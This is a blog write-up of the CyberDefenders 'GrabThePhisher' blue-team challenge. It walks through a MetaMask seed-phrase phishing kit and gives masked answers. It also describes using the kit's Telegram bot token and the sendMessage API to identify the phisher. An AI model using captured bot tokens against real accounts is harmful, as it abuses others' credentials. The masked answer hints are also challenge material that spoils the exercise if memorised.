CyberDefenders: GrabThePhisher

This Blue Team challenge was released on 7/23/2022 from CyberDefenders. You can access the room at

This is one of the easiest challenges I’ve ever encountered from This is a perfect challenge for beginners who just want to get their feet wet in doing hacking/IR challenges. The skills/tools to be tested and needed to complete this challenge are looking at the code used by the phishing actor through any text editor/viewer and also a little bit of research on how Telegram works.

I hope you will find my write-up helpful.

First, download the challenge file and unzip it:

  • Which wallet was used for asking the seed phrase?
    • m*******
  1. Browse to c75-GrabThePhisher > pankewk > metamask
  2. Open the file metamask.php with your choice of text editor/viewer
  • What is the file name that has the code for the phishing kit?
    • m*******.***
  • In which language was the kit written?
    • p**
  • What service does the kit use to retrieve the victim’s machine information?
    • s**** ***
  • How many seed phrases were already collected?
    • *
  1. Browse to c75-GrabThePhisher > pankewk > log
  2. Open log.txt
  • Write down the seed phrase of the most recent phishing incident?
    • f***** **** ******* ****** ******* ******* ******** ******* ***** **** ****** ******
  • Which medium had been used for credential dumping?
    • t*******
  1. Look inside the file metamask.php again
  • What is the token for the channel?
    • 5*********:***********************************
  • What is the chat ID of the phisher’s channel?
    • 5*********
  • What is the alias of the phish kit developer?
    • j***********
  • What is the full name of the phish actor?
    • M***** ********
  1. To find the full name of the phish actor, we have to use the information that we have on-hand like the Telegram userID, token, and url found inside the file metamask.php
  2. Read about the Telegram bot API from the page,
  3. We will have to utilize the sendMessage method in Telegram, passing the chatID and sending a random message through text.
  4. Enter the following to the URL bar: enter_userID_here&text=Hello_World
  • What is the username of the phish actor?
    • p**********

Thank you for checking my write-up. Please subscribe if you haven’t.

Published by lightkunyagami

Join the Conversation


Leave a comment

Leave a Reply to lightkunyagami Cancel reply

Please log in using one of these methods to post your comment: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: